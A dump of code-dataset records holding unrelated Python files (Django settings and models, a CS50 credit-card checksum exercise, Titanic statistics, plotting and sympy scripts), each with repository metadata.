https://docs.djangoproject.com/en/1.10/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/1.10/ref/settings/
"""
import os
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/1.10/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = 't^0lrky-##dimv-a-o3hgd4-s40bx2ibw7qw6+wdcjh)6$(lgl'
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
ALLOWED_HOSTS = []
# Application definition
INSTALLED_APPS = [
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
]
MIDDLEWARE = [
'django.middleware.security.SecurityMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
]
ROOT_URLCONF = 'mysite.urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
],
},
},
]
WSGI_APPLICATION = 'mysite.wsgi.application'
# Database
# https://docs.djangoproject.com/en/1.10/ref/settings/#databases
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': os.path.join(BASE_DIR, 'db.sqlite3'),
}
}
# Password validation
# https://docs.djangoproject.com/en/1.10/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
{
'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
},
]
# Internationalization
# https://docs.djangoproject.com/en/1.10/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/1.10/howto/static-files/
STATIC_URL = '/static/'
| [
"jhe0956@gmail.com"
] | jhe0956@gmail.com |
f2fc421977a8d2618d5c627046454404bb3fc8c8 | a769aaa89f5314f3702e1926d86b4e6ece79d701 | /accounts/models.py | 3c077bbe1cdc2546621f45dc5c3c1e09b9f3f737 | [] | no_license | CASPER-REPSAC/casper-backend | 3bfb5e75dea8c9134f1c8cf0e6ea09e8f8500d65 | 5d2d21c15d0312e65b96bf0c0a84f52e4c57ca00 | refs/heads/main | 2023-07-13T18:39:47.297854 | 2021-07-12T06:11:37 | 2021-07-12T06:11:37 | 378,759,864 | 1 | 0 | null | 2021-09-07T04:23:11 | 2021-06-20T23:41:01 | Python | UTF-8 | Python | false | false | 2,836 | py | from django.db import models
from django.utils.translation import ugettext_lazy as _
from django.contrib.auth.models import AbstractUser, BaseUserManager
class UserManager(BaseUserManager):
def create_user(self, email, password, **extra_fields):
if not email:
raise ValueError(_('The Email must be set'))
email = self.normalize_email(email)
user = self.model(email=email, **extra_fields)
user.set_password(password)
user.save()
return user
def create_superuser(self, email, password, **extra_fields):
extra_fields.setdefault('is_staff', True)
extra_fields.setdefault('is_superuser', True)
extra_fields.setdefault('is_active', True)
if extra_fields.get('is_staff') is not True:
raise ValueError(_('Superuser must have is_staff=True.'))
if extra_fields.get('is_superuser') is not True:
raise ValueError(_('Superuser must have is_superuser=True.'))
return self.create_user(email, password, **extra_fields)
class User(AbstractUser):
username = None
registration_date = models.DateTimeField(auto_now_add=True)
real_name = models.CharField(max_length=10)
nickname = models.CharField(max_length=10)
email = models.EmailField(unique=True, max_length=255)
birth_date = models.DateTimeField(null=True)
photo = models.CharField(max_length=30)
stacks = models.CharField(max_length=30)
homepage = models.CharField(max_length=30)
blog = models.CharField(max_length=30)
contact = models.CharField(max_length=30)
description = models.TextField()
feed_mail = models.EmailField(max_length=255)
USERNAME_FIELD = 'email'
REQUIRED_FIELDS = []
objects = UserManager()
def __str__(self):
return self.email
class Appeal(models.Model):
author = models.ForeignKey('accounts.User', related_name='appeal', on_delete=models.CASCADE)
updated_date = models.DateTimeField(auto_now_add=True)
content = models.TextField()
class Activist(models.Model):
owner = models.ForeignKey('accounts.User', related_name='activist', on_delete=models.CASCADE)
visible = models.BooleanField(default=True)
point = models.IntegerField(default=0)
total_point = models.IntegerField(default=0)
class Observer(models.Model):
owner = models.ForeignKey('accounts.User', related_name='observer', on_delete=models.CASCADE)
visible = models.BooleanField(default=True)
point = models.IntegerField(default=0)
total_point = models.IntegerField(default=0)
class Rescuer(models.Model):
owner = models.ForeignKey('accounts.User', related_name='rescuer', on_delete=models.CASCADE)
visible = models.BooleanField(default=True)
point = models.IntegerField(default=0)
total_point = models.IntegerField(default=0)
| [
"noreply@github.com"
] | noreply@github.com |
407e57da096a27e7fe849dfebaf14391770fd017 | 4206744104467aa21a08fe66b8571dcad1c3479e | /versuch timegenerator.py | 2a0af7084d8ae43975cb74eed389bd25bfbceea0 | [] | no_license | Manuel-D92/Masterarbeit | 7f2bad173652cca4283b6b428b7eab8a94bae920 | bbaa590ab82d545ba008675449f00468fef13789 | refs/heads/main | 2023-05-10T15:21:27.457060 | 2021-06-07T18:31:20 | 2021-06-07T18:31:20 | 374,754,147 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,075 | py | from sklearn.model_selection import train_test_split
from sklearn import preprocessing
import numpy as np
from keras.preprocessing.sequence import TimeseriesGenerator
import tensorflow as tf
import matplotlib.pyplot as plt
from datetime import datetime
import torch
import pandas as pd
import os
#from tensorflow.keras.layers.experimental import preprocessing
#class WindowGenerator():
# def __init__(self, input_width, label_width, shift,
# train_df=train_df, val_df=val_df, test_df=test_df,
# label_columns=None):
# # Store the raw data.
# self.train_df = train_df
# self.val_df = val_df
# self.test_df = test_df
#
# # Work out the label column indices.
# self.label_columns = label_columns
# if label_columns is not None:
# self.label_columns_indices = {name: i for i, name in
# enumerate(label_columns)}
# self.column_indices = {name: i for i, name in
# enumerate(train_df.columns)}
#
# # Work out the window parameters.
# self.input_width = input_width
# self.label_width = label_width
# self.shift = shift
#
# self.total_window_size = input_width + shift
#
# self.input_slice = slice(0, input_width)
# self.input_indices = np.arange(self.total_window_size)[self.input_slice]
#
# self.label_start = self.total_window_size - self.label_width
# self.labels_slice = slice(self.label_start, None)
# self.label_indices = np.arange(self.total_window_size)[self.labels_slice]
#
# def __repr__(self):
# return '\n'.join([
# f'Total window size: {self.total_window_size}',
# f'Input indices: {self.input_indices}',
# f'Label indices: {self.label_indices}',
# f'Label column name(s): {self.label_columns}'])
#
# def split_window(self, features):
# inputs = features[:, self.input_slice, :]
# labels = features[:, self.labels_slice, :]
# if self.label_columns is not None:
# labels = tf.stack(
# [labels[:, :, self.column_indices[name]] for name in self.label_columns],
# axis=-1)
#
# # Slicing doesn't preserve static shape information, so set the shapes
# # manually. This way the `tf.data.Datasets` are easier to inspect.
# inputs.set_shape([None, self.input_width, None])
# labels.set_shape([None, self.label_width, None])
#
# return inputs, labels
path = r"C:\Users\dauserml\Documents\2020_09_25\Messung_1"
path_test_sequenz = r"C:\Users\dauserml\Documents\2020_09_25\Testsequenz_1"
time_xyz_antennen_Signal_Komplex_all_Files = np.loadtxt(path+"\\all_Files.csv",delimiter=';')
time = time_xyz_antennen_Signal_Komplex_all_Files[:,0]
data = np.array([[i] for i in range(50)])
targets = np.array([[i] for i in range(50)])
X_1 = time_xyz_antennen_Signal_Komplex_all_Files[:,4:]
Y_1 = time_xyz_antennen_Signal_Komplex_all_Files[:,1:4]
data_gen = TimeseriesGenerator(X_1,Y_1, length=16, sampling_rate=4,batch_size=32)
assert len(data_gen) == 2236
batch_0 = data_gen[0]
batch_1 =data_gen[1]
x, y = batch_0
print('fsdf') | [
"85513263+Manuel-D92@users.noreply.github.com"
] | 85513263+Manuel-D92@users.noreply.github.com |
9055f539063c9603f998ca03a91b0406cc348a06 | 731e8ba383666085170fa74cef0511a36e009f42 | /utilities/robot_hand.py | 3d266c9d09901cdf6b5f199937a40104da0b97c2 | [
"MIT"
] | permissive | riccardosven/bypasser | 91e05587481fcca33b2cb4df9d484c94e5597679 | ffe079104879246a125ed29dba4bfe87e883b3d3 | refs/heads/master | 2021-05-28T22:43:42.356253 | 2015-07-09T14:27:23 | 2015-07-09T14:27:23 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 856 | py | #! /usr/bin/env python
###############################################################################
##
## robot_hand.py -- part of the bypasser program
##
## Copyright (c) 2014 Riccardo Sven Risuleo
##
## This software may be modified and distributed under the terms
## of the MIT license. See the LICENSE file for details.
##
###############################################################################
import serial
class RobotHand:
def __init__(self,device,baudrate):
try:
self.port = serial.Serial(device,baudrate)
except:
print('Could not open serial port')
def send(self,command):
try:
self.port.write(command)
except:
print('Cannot write to Arduino')
def close(self):
try:
self.port.close()
except:
pass
| [
"rsrsl"
] | rsrsl |
b83c20614a7c84216cff5466d3b48076c7c69baa | 59fe6c8730fd1b70e8fb791ba294cb35b76f5908 | /pset6/credit/credit.py | 13e978e236efb66f0b016a532b26789c352557a3 | [] | no_license | mykolas-s/cs50_Harvard | 4ec155c336c8be240cb289d85deec882246fd45b | 13053db0184bca485a439f5ddf2c445674ee2fa4 | refs/heads/master | 2020-04-30T23:05:38.455299 | 2019-03-22T12:44:24 | 2019-03-22T12:44:24 | 177,135,746 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,028 | py | from cs50 import get_int
while True:
cc_number = get_int("credit card number: ")
if (cc_number):
break
string_number = str(cc_number)
digit_number = len(string_number) # how many digits there are in number
digit1 = int(string_number[0])
digit2 = int(string_number[1])
# magic formula
sum = 0
m = 1
for i in range(digit_number):
if (m % 2 == 0):
z = int(string_number[-m])*2
sum += z % 10
if (z >= 10):
sum += int(str(z)[0])
elif (m % 2 != 0):
y = int(string_number[-m])
sum += y
m += 1
if (m > digit_number):
break
x = sum % 10
#check card's validity
if (((digit1 == 3 and digit2 == 4 or digit2 == 7) and x == 0 and digit_number == 15)):
print("AMEX")
elif ((digit1 == 5 and digit2 == 1 or digit2 == 2 or digit2 == 3 or digit2 == 4 or digit2 == 5) and x == 0 and digit_number == 16):
print("MASTERCARD")
elif (digit1 == 4 and x == 0 and digit_number == 13 or digit_number == 16):
print("VISA")
else:
print("INVALID") | [
"mykolas.sermuksnis@gmail.com"
] | mykolas.sermuksnis@gmail.com |
5b42eece199dfcaef7a177a031dc5463bfde4e0b | 31f4edfcdcd6fdf64fb29ea8153adcd3df4a21b7 | /django/dbase/migrations/0001_initial.py | b2e99c28310e6bed3c96cda910923c4b45f26222 | [] | no_license | djs-gitbub/Models3 | e01417003e8d832cbbe584a99cb78a9d8930d8dd | d48be17644ccc2cfdd5abd195e676dea8cfba81b | refs/heads/main | 2023-04-03T00:28:53.448919 | 2021-03-30T16:00:20 | 2021-03-30T16:00:20 | 353,058,113 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 658 | py | # Generated by Django 3.1.7 on 2021-03-30 15:27
from django.db import migrations, models
class Migration(migrations.Migration):
initial = True
dependencies = [
]
operations = [
migrations.CreateModel(
name='Vocab',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('author', models.CharField(max_length=100)),
('title', models.CharField(max_length=100)),
('year', models.IntegerField()),
('genre', models.CharField(max_length=100)),
],
),
]
| [
"selfedavid@gmail.com"
] | selfedavid@gmail.com |
8f1ad74885c3e26272c09d24c7a5c2073c619087 | bb8ed8b5aeede5f503ff5dac3870cf3817619282 | /trunk/soft/common/tools/change_pkg_proto.py | a4d8b24460f16c0c6a6455fd20e6e89f113f0b26 | [] | no_license | mengtest/idle | 561da3b4542ceca8a1b983e9214a57d6ecb7d22d | 6e7866d0f493155fbfc9c2c35062af833217cbd0 | refs/heads/master | 2022-03-01T00:07:51.808702 | 2019-10-31T11:09:22 | 2019-10-31T11:09:22 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 610 | py | import sys
if __name__ == '__main__':
if len(sys.argv) > 1:
fname = sys.argv[1]
with open(fname, 'r') as f:
content = f.read()
flag = True
start = 0
while flag:
flag = False
i1 = content.find("_pb2 as ", start)
start = i1 + 21
if i1 >= 0:
flag = True
i2 = content.rfind("import", 0, i1)
content = content[0:i2 + 7] + "common.proto." + content[i2 + 7:]
with open(fname, 'w') as f:
f.write(content)
| [
"rocketxyfb@163.com"
] | rocketxyfb@163.com |
904c9c33359008e76bd3c89361e92714a6f69710 | 1b6836d8693f1e2644adc0e62f88f4f7ed5fc9cf | /kaggle/python/train_stats.py | 86362e6639c655158a1484cddbd49d9273ba2d55 | [] | no_license | gaudibr/datasci_course_materials | 0ea76da0d0cfcad94110593aa2fa7eb7a647c3c1 | 49ad8ddb29b256375f58c6f40d639b6162e35eef | refs/heads/master | 2020-12-25T00:29:02.172757 | 2013-07-06T00:48:54 | 2013-07-06T00:48:54 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,870 | py | """ This simple code is desinged to teach a basic user to read in the files in python, simply find what proportion of males and females survived and make a predictive model based on this
Author : AstroDave
Date : 18th September, 2012
"""
import csv as csv
import numpy as np
import math
#calculate entropy for the different attributes:
def entropy(labels):
""" Computes entropy of label distribution. """
n_labels = len(labels)
print n_labels
if n_labels <= 1:
return 0
counts = np.bincount(labels)
print counts
probs = [float(i) / float(n_labels) for i in counts]
print probs
n_classes = np.count_nonzero(probs)
print n_classes
if n_classes <= 1:
return 0
ent = 0.
# Compute standard entropy.
for i in probs:
ent -= i * math.log(i, n_classes)
return ent
csv_file_object = csv.reader(open('../csv/train.csv', 'rb')) #Load in the csv file
header = csv_file_object.next() #Skip the fist line as it is a header
data=[] #Creat a variable called 'data'
for row in csv_file_object: #Skip through each row in the csv file
data.append(row) #adding each row to the data variable
data = np.array(data) #Then convert from a list to an array
#Now I have an array of 11 columns and 891 rows
#I can access any element I want so the entire first column would
#be data[0::,0].astype(np.flaot) This means all of the columen and column 0
#I have to add the astype command
#as when reading in it thought it was a string so needed to convert
number_passengers = np.size(data[0::,0].astype(np.float))
number_survived = np.sum(data[0::,0].astype(np.float))
proportion_survivors = number_survived / number_passengers
print 'Proportion of people who survived is %s' %proportion_survivors
passenger_data = data[0::,0].astype(np.int)
#print passenger_data
print 'Entropy for survivors is %s' %entropy(passenger_data)
data[data[0::,3]=='male',3] = 1
data[data[0::,3]=='female',3] = 0
# I can now find the stats of all the women on board
women_only_stats = data[ data[0::,3] == 0 ] #This finds where all the women are
#men_only_stats = data[0::,3] == 1 #This finds where all the men are
# != means not equal
print women_only_stats
#I can now find for example the ages of all the women by just placing
#women_only_stats in the '0::' part of the array index. You can test it by
#placing it in the 4 column and it should all read 'female'
women_onboard = data[women_only_stats,0].astype(np.int)
men_onboard = data[men_only_stats,0].astype(np.float)
proportion_women_survived = np.sum(women_onboard) / np.size(women_onboard)
proportion_men_survived = np.sum(men_onboard) / np.size(men_onboard)
print 'Proportion of women who survived is %s' % proportion_women_survived
print 'Proportion of men who survived is %s' % proportion_men_survived
| [
"andre.ambrosio@me.com"
] | andre.ambrosio@me.com |
c49705f6dd326f1e0802c350858608f5fa07c66c | 24bf46f243dc6efbe28b714b47b8e0302bb1296d | /Week8/ex3/string_match.py | be4ede72709e0bcf0df7e28b3fbf204a00d6b968 | [] | no_license | AizadaNur/WebDev | 5e14387dfa6d415de0ac2198f03857b8bb5fc602 | e1e14e6642b8ce4db7319779765de86c82dea331 | refs/heads/master | 2022-04-10T11:20:44.359588 | 2020-04-06T12:34:59 | 2020-04-06T12:34:59 | 250,175,834 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 244 | py | def string_match(a, b):
shorter = min(len(a), len(b))
count = 0
for i in range(shorter - 1):
a_sub = a[i:i + 2]
b_sub = b[i:i + 2]
if a_sub == b_sub:
count = count + 1
return count | [
"noreply@github.com"
] | noreply@github.com |
c9f5462865456218e08ee41c59bc87ac1d9523dc | 6c922b75cd0f7b76d80d1f0e0b4e7e65b2d6ed52 | /code/plotting/snapshots_figure.py | 1d9e626e0257180007141e75fea28f3f7b6df149 | [] | no_license | mahdikooshkbaghi/stratified_heat_transport_paper2017 | 5f879e690908604272617915a8e2461b09d003a3 | db5864e37494f271da8cc0d533381e7378944daa | refs/heads/master | 2022-08-26T07:32:43.489533 | 2018-04-27T19:57:27 | 2018-04-27T19:57:27 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 8,502 | py | import matplotlib
matplotlib.use('Agg')
matplotlib.rcParams.update({'font.size': 11, 'axes.labelsize': 10})
from mpl_toolkits.axes_grid1 import make_axes_locatable
import matplotlib.pyplot as plt
plt.style.use('classic')
import matplotlib.patheffects as PathEffects
import matplotlib.colorbar as colorbar
from base.plot_buddy import MovieBuddy
import numpy as np
FIGWIDTH=3+7.0/16
FIGHEIGHT= FIGWIDTH*1
start_file=49
n_files = 3
dir1="/nobackup/eanders/sp2017/comps_data/FC_poly_fixed_constMu_constKappa_nrhocz3_Ra1.00e6_Pr1_eps1e-4_nusselt_fixedT_highres/"
#dir1="/nobackup/eanders/sp2017/fc_poly_hydro/FC_poly_fixed_constMu_constKappa_2D_nrhocz3_Ra1.00e6_Pr1_eps1e-4_a4_nusselt_fixedT"
dir2="/nobackup/eanders/sp2017/fc_poly_hydro/FC_poly_fixed_constMu_constKappa_2D_nrhocz3_Ra1.00e6_Pr1_eps5e-1_a4_nusselt_fixedT"
dir3="/nobackup/eanders/sp2017/fc_poly_hydro/FC_poly_fixed_constMu_constKappa_2D_nrhocz3_Ra4.64e7_Pr1_eps5e-1_a4_nusselt_fixedT"
dir4="/nobackup/bpbrown/polytrope-evan-3D/FC_poly_3D_nrhocz3_Ra1e6_Pr1_eps1e-4_a4/"
stds=1
def add_snapshot_subplot(ax, dir, start_file, do_cbar=False, figure_index=0, n_files=3, field='s', horiz_slice=False, plot_label=None, dims='$\mathrm{2D}$ | '):
plotter = MovieBuddy(dir, max_files=n_files, start_file=start_file)
plotter.add_subplot(field, 0, 0, zlabel="s'", sub_t_avg=True)
plotter.analyze_subplots()
slices = plotter.grab_whole_profile(plotter.local_files['slices'], plotter.local_writes_per_file,
subkey=['tasks'], profile_name=[field])
#max = plotter.ax[0]['mean']+stds*plotter.ax[0]['stdev']/2
#min = plotter.ax[0]['mean']-stds*plotter.ax[0]['stdev']/2
max = plotter.ax[0]['max_val']/3
min = -plotter.ax[0]['max_val']/3
if horiz_slice:
xs, ys = plotter.y_xx, plotter.y_yy
else:
xs, ys = plotter.xs, plotter.zs
if type(plotter.y) == type(None):
img = ax.pcolormesh(xs, ys, slices[field][figure_index,:,:]-plotter.ax[0]['t_avg'], cmap='RdBu_r',
vmin=min, vmax=max)
else:
if horiz_slice:
img = ax.pcolormesh(xs, ys, slices[field][figure_index,:,:][:,:,0]-np.mean(plotter.ax[0]['t_avg']), cmap='RdBu_r',
vmin=min, vmax=max)
else:
img = ax.pcolormesh(xs, ys, slices[field][figure_index,:,:][:,0,:]-plotter.ax[0]['t_avg'], cmap='RdBu_r',
vmin=min, vmax=max)
ax.set_xlim(np.min(xs), np.max(xs))
ax.set_ylim(np.min(ys), np.max(ys))
xticks = np.array([0, np.max(xs)/2, np.max(xs)])
xticklabels = [r'${:1.1f}$'.format(tick) for tick in xticks]
xticklabels[0] = r'${:1d}$'.format(0)
plt.xticks(xticks, xticklabels, fontsize=8)
yticks = np.array([0, np.max(ys)])
yticklabels = [r'${:1.1f}$'.format(tick) for tick in yticks]
yticklabels[0] = r'${:1d}$'.format(0)
plt.yticks(yticks, yticklabels, fontsize=8)
custom_label=True
if type(plot_label) == type(None):
custom_label=False
small_eps, small_ra = False, False
plot_label = '{:s}$\epsilon='.format(dims)
if plotter.atmosphere['epsilon'] < 0.1:
plot_label += '10^{'
plot_label += '{:1.0f}'.format(np.log10(plotter.atmosphere['epsilon']))
plot_label += '}$'
else:
plot_label += '{:1.1f}$'.format(plotter.atmosphere['epsilon'])
small_eps = True
ra_log = np.log10(plotter.atmosphere['rayleigh'])
plot_label += ' | $\mathrm{Ra} = 10^{'
if np.floor(ra_log) == ra_log:
plot_label += '{:1.0f}'.format(ra_log)
small_ra = True
else:
plot_label += '{:1.2f}'.format(ra_log)
plot_label += '}$'
plot_label = r'({:s})'.format(plot_label)
else:
plot_label = r'(${:s}$)'.format(plot_label)
# plt.annotate(plot_label, coords, size=9, color='white', path_effects=[PathEffects.withStroke(linewidth=1.2, foreground='black')])
if max > 0.1:
cbar_label = '$\pm {:1.2f}$'.format(max)
else:
str = '{:1.2e}'.format(max)
print(str)
if 'e+0' in str:
newstr = str.replace('e+0', '\\times 10^{')
elif 'e-0' in str:
newstr = str.replace('e-0', '\\times 10^{-')
else:
newstr = str.replace('e', '\\times 10^{')
newstr += '}'
cbar_label = '$\pm {:s}$'.format(newstr)
# cbar_label += ' ({:s})'.format(plot_label)
if do_cbar:
cax, kw = colorbar.make_axes(ax, fraction=0.15, pad=0.03, aspect=5, anchor=(0,0), location='top')
cbar = colorbar.colorbar_factory(cax, img, **kw)
for label in cax.xaxis.get_ticklabels():
label.set_visible(False)
cax.tick_params(axis=u'both', which=u'both',length=0)
trans = cax.get_yaxis_transform()
cax.annotate(r'{:s}'.format(cbar_label), (1.02,0.04), size=8, color='black', xycoords=trans)
cax.annotate(r'{:s}'.format(plot_label), (2.08,0.04), size=8, color='dimgrey', xycoords=trans)
else:
divider = make_axes_locatable(ax)
if horiz_slice:
cax = divider.append_axes('top', size='40%', pad=0.01)
cbx = divider.append_axes('bottom', size='30%', pad=0.01)
cbx.set_frame_on(False)
cbx.get_xaxis().set_visible(False)
cbx.get_yaxis().set_visible(False)
for xlabel in cbx.xaxis.get_ticklabels():
xlabel.set_visible(False)
for ylabel in cbx.yaxis.get_ticklabels():
ylabel.set_visible(False)
else:
cax = divider.append_axes('top', size='10%', pad=0.06)
cax.set_frame_on(False)
cax.get_xaxis().set_visible(False)
cax.get_yaxis().set_visible(False)
for xlabel in cax.xaxis.get_ticklabels():
xlabel.set_visible(False)
for ylabel in cax.yaxis.get_ticklabels():
ylabel.set_visible(False)
trans = ax.get_xaxis_transform() # x in data untis, y in axes fraction
ann = ax.annotate(cbar_label, xy=(-0.05, 1.05 ), size=8, color='black', xycoords=trans)
if not custom_label:
if np.floor(ra_log) != ra_log:
ann = ax.annotate(plot_label, xy=(xticks[-1]*0.48, 1.05 ), size=8, color='dimgrey', xycoords=trans)
elif small_eps:
ann = ax.annotate(plot_label, xy=(xticks[-1]*0.53, 1.05 ), size=8, color='dimgrey', xycoords=trans)
else:
ann = ax.annotate(plot_label, xy=(xticks[-1]*0.49, 1.05 ), size=8, color='dimgrey', xycoords=trans)
else:
ann = ax.annotate(plot_label, xy=(xticks[1]*1.25, 1.05 ), size=8, color='dimgrey', xycoords=trans)
# plt.annotate(cbar_label, (0, yticks[-1]*1.01), size=8, color='black')
fig = plt.figure(figsize=(2*FIGWIDTH, FIGHEIGHT), dpi=1200)
plt.subplots_adjust(wspace=0.4)
ax1 = plt.subplot2grid((3,4), (0,0), colspan=2)
add_snapshot_subplot(ax1, dir1, 85, do_cbar=True, figure_index=20, n_files=3)
ax2 = plt.subplot2grid((3,4), (1,0), colspan=2)
add_snapshot_subplot(ax2, dir2, 70, figure_index=64, n_files=4)
ax3 = plt.subplot2grid((3,4), (2,0), colspan=2)
add_snapshot_subplot(ax3, dir3, 70, figure_index=5, n_files=2)
#3D
ax4 = plt.subplot2grid((3,4), (0,2), colspan=2)
add_snapshot_subplot(ax4, dir4, 30, figure_index=9, n_files=2, dims= '$\mathrm{3D}$ | ')
ax5 = plt.subplot2grid((3,4), (1,2), rowspan=2)
add_snapshot_subplot(ax5, dir4, 30, figure_index=9, n_files=2, field='s midplane', horiz_slice=True, plot_label='z=L_z/2')
ax6 = plt.subplot2grid((3,4), (1,3), rowspan=2)
add_snapshot_subplot(ax6, dir4, 30, figure_index=9, n_files=2, field='s near top', horiz_slice=True, plot_label='z=L_z')
#ax2.plot([-0.11, 1.055], [1.175, 1.175], transform=ax2.transAxes, clip_on=False, color='black', linewidth=0.35)
#ax3.plot([-0.11, 1.055], [1.175, 1.175], transform=ax3.transAxes, clip_on=False, color='black', linewidth=0.35)
labels = [r'$\mathrm{(a)}$', r'$\mathrm{(b)}$', r'$\mathrm{(c)}$', r'$\mathrm{(d)}$', r'$\mathrm{(e)}$', r'$\mathrm{(f)}$']
axes = [ax1, ax2, ax3, ax4, ax5, ax6]
x_coords = [-0.1, -0.1, -0.1, -0.1, -0.2, -0.2]
y_coords = [3, 8, 8, 3, 10.7, 10.7]
for i, ax in enumerate(axes):
label = labels[i]
trans = ax.get_yaxis_transform() # y in data untis, x in axes fraction
ann = ax.annotate(label, xy=(x_coords[i], y_coords[i]), size=9, color='black', xycoords=trans)
print('saving png')
plt.savefig('./figs/snapshots_fig.png', bbox_inches='tight', dpi=600)
| [
"evan.anders@colorado.edu"
] | evan.anders@colorado.edu |
e7286bf68d15b2d3db9a057f10671fc073ab2fe3 | de390163287fda86b73df015d6b6a3dc5e1bf736 | /Codechef/September 2019/Long Challenge/test.py | 3d59dfaf9a3263d8a1af70275f55da158193ba5d | [] | no_license | iamarshsingh/Competative_programming | fb71a7b62d4ba2846deae25203f9087f31a0b675 | 09418842d029b20d2df0f5b5a5e87619f44a18b3 | refs/heads/master | 2020-06-26T14:39:59.199295 | 2020-03-28T14:05:26 | 2020-03-28T14:05:26 | 97,026,462 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 187 | py | arr = [ i for i in range(1,5001) ]
for i in range(1,5001):
sum = 0
for j in range(1,i+1):
sum = sum + ((i*i)//j)
#print(sum)
sum = (2*sum) - (i*i)
arr[i-1] = sum
print(arr) | [
"singh.arshdeep1999@gmail.com"
] | singh.arshdeep1999@gmail.com |
f9795e22c2bfb02371122e898ea5d73349fc3146 | 791a66a3e9fbc554cbcb95685d511f82eb67b9bf | /src/generate_polys.py | 8e0bb7b178bd87607a1d3442b427b6802778d72f | [] | no_license | devingreene/order_perturbations_5loci | 0532c4c9800ca18cbcb38fd2d65aa25eb8f17bc8 | 3cc165da64b19ff468748519999e2d36c63e416f | refs/heads/master | 2020-03-27T21:28:59.086610 | 2018-09-03T19:42:09 | 2018-09-03T19:42:09 | 147,148,027 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,710 | py | from sympy.parsing.sympy_parser import parse_expr
__all__ = ['append_and_add_symbols','generate_polys','symbols']
symbols = set()
def append_and_add_symbols(lst,str_):
expr = parse_expr(str_)
lst.append(expr)
symbols.update(expr.free_symbols)
def _switch(bit):
return '0' if bit=='1' else '1' if bit == '0' else None
def generate_polys():
poly_list = []
for k in range(5):
# i,j are the two backgrounds
for i in range(16):
for j in range(i+1,16):
# Fill with zeros on the left and convert to base 2
a = '{:04b}'.format(i)
b = '{:04b}'.format(j)
# Insert flipped loci appropriately
a0 = a[:k] + '0' + a[k:]
a1 = a[:k] + '1' + a[k:]
b0 = b[:k] + '0' + b[k:]
b1 = b[:k] + '1' + b[k:]
# add polynomial
append_and_add_symbols(poly_list,'(w{} - w{})*(w{} - w{})'.format(a0,a1,b0,b1))
#k,l represent where among changing loci background loci are placed.
# There are n+1 positions to choose from among n background loci
for k in range(4):
for l in range(k,4):
#i,j are backgrounds -> 3 loci means 8 backgrounds, taken in pairs
for i in range(8):
for j in range(i+1,8):
# See above in one mutant case
a,b = ('{:03b}'.format(x) for x in (i,j))
# Two initial states
for ch in (('0','0'),('0','1')):
# Insert loci which change appropriately
append_and_add_symbols(poly_list,
('(w{} - w{})*'.format(a[:k]+ch[0]+a[k:l]+ch[1]+a[l:],
a[:k]+_switch(ch[0])+a[k:l]+_switch(ch[1])+a[l:]) +
'(w{} - w{})'.format(b[:k]+ch[0]+b[k:l]+ch[1]+b[l:],
b[:k]+_switch(ch[0])+b[k:l]+_switch(ch[1])+b[l:]))
)
# See comments in two-mutant block to understand how this works.
for k in range(3):
for l in range(k,3):
for m in range(l,3):
for i in range(4):
for j in range(i+1,4):
a,b = ('{:02b}'.format(x) for x in (i,j))
for ch in (('0','0','0'),('0','0','1'),('0','1','0'),
('0','1','1')):
append_and_add_symbols(poly_list,
('(w{} - w{})*'.format(
a[:k]+ch[0]+a[k:l]+ch[1]+a[l:m]+ch[2]+a[m:],
a[:k]+_switch(ch[0])+a[k:l]+_switch(ch[1])+a[l:m]+_switch(ch[2])+a[m:]) +
'(w{} - w{})'.format(
b[:k]+ch[0]+b[k:l]+ch[1]+b[l:m]+ch[2]+b[m:],
b[:k]+_switch(ch[0])+b[k:l]+_switch(ch[1])+b[l:m]+_switch(ch[2])+b[m:]))
)
# See comments in two-mutant block to understand how this works.
for k in range(2):
for l in range(k,2):
for m in range(l,2):
for n in range(m,2):
for i in range(2):
for j in range(i+1,2):
a,b = ('{:01b}'.format(x) for x in (i,j))
# iterate thru (0,0,0,0),(0,0,0,1),(0,0,1,0) ...
for ch in ( list('0{:03b}'.format(i)) for i in range(8)):
append_and_add_symbols(poly_list,
('(w{} - w{})*'.format(
a[:k]+ch[0]+a[k:l]+ch[1]+a[l:m]+ch[2]+a[m:n]+ch[3]+a[n:],
a[:k]+_switch(ch[0])+
a[k:l]+_switch(ch[1])+
